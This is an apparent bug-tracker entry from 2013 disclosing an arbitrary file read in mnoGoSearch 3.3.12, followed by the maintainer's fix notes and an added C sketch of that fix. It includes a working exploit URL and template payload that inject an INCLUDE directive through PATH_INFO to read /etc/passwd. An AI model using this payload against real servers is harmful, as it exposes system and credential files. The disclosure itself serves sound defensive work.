Bug#4818

Status: Closed
From: ymaryshev [ at ] ptsecurity [ dot ] ru
Date: 2013-02-15 17:44:20
Type: Other problems
OS:
Version: 3.3.12
Database type:
DBMode:
Assigned To:
Short Desc.: Arbitrary Files Reading in mnoGoSearch

[2013-02-15 17:44:20] ymaryshev at ptsecurity.ru
Positive Technologies experts have detected an Arbitrary Files Reading vulnerability in mnoGoSearch.

Passing startup parameters via QUERY_STRING (http://tools.ietf.org/html/draft-robinson-www-interface-00#section-7) for an application running in CGI mode can be used to set page template path variable "d". Generating a template file on the server and specifying it in the variable "d" can result in Arbitrary Files Reading via <!INCLUDE CONTENT="URI"> template structure.

---[ Exploitation example ]

The /proc/self/environ file, in which part of the template is formed through the PATH_INFO environment variable, can be used as a template.

<!--top-->
<!INCLUDE CONTENT="file:/etc/passwd">
<!--/top-->

http://host/cgi-bin/search.cgi/%0A%3C!--top--%3E%0A%3C!INCLUDE%20CONTENT=%22file:/etc/passwd%22%3E%0A%3C!--/top--%3E?-d/proc/self/environ

---[ Solution ]

Startup parameters overriding via QUERY_STRING must be prevented.

---[ Credits ]

Vulnerability was detected by Sergey Bobrov, Positive Research Center (Positive Technologies Company)

[2013-02-25 12:55:50] bar at mnogosearch.org
Thanks for reporting!

This bug has been fixed in mnogosearch-3.3.13,
which will be released soon.

search.cgi now ignored command line options (including -d)
when running under HTTPD.

[2013-02-25 12:56:15] bar at mnogosearch.org
Typo:

s/ignored/ignores
[2013-03-01 00:26:46] bar at mnogosearch.org
mnogosearch-3.3.13 is available from the site now.
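
The fix described in this thread (ignoring command-line options, including -d, when running under HTTPD), sketched as an added example that is not mnoGoSearch source code. The function names, the default template path, and the use of the GATEWAY_INTERFACE and REQUEST_METHOD CGI variables to detect HTTPD are assumptions.

```c
/* Added example with hypothetical names; not taken from mnoGoSearch. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed placeholder for a compiled-in template location. */
#define DEFAULT_TEMPLATE "/usr/local/etc/search.htm"

/* A web server sets these CGI meta-variables for every request it hands
 * to a CGI program; an interactive shell normally sets neither. */
static int under_httpd(const char *gateway_interface, const char *request_method)
{
    return (gateway_interface && *gateway_interface) ||
           (request_method && *request_method);
}

/* Choose the template file. Under HTTPD, argv can be derived from the
 * request's QUERY_STRING, so it is untrusted and is not parsed at all. */
static const char *template_path(int argc, char **argv, int cgi)
{
    const char *path = DEFAULT_TEMPLATE;
    int i;

    if (cgi)
        return path;                      /* ignore every command-line option */

    for (i = 1; i < argc; i++) {
        if (strncmp(argv[i], "-d", 2) != 0)
            continue;
        if (argv[i][2] != '\0')
            path = argv[i] + 2;           /* -dPATH  */
        else if (i + 1 < argc)
            path = argv[++i];             /* -d PATH */
    }
    return path;
}

int main(int argc, char **argv)
{
    int cgi = under_httpd(getenv("GATEWAY_INTERFACE"), getenv("REQUEST_METHOD"));

    printf("mode: %s, template: %s\n",
           cgi ? "httpd" : "shell", template_path(argc, argv, cgi));
    return 0;
}
```

Run from a shell, `-d` still selects the template; with either CGI variable present, the compiled-in default is always used.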



Copyright © 2000-2013 Lavtech.Com Corp.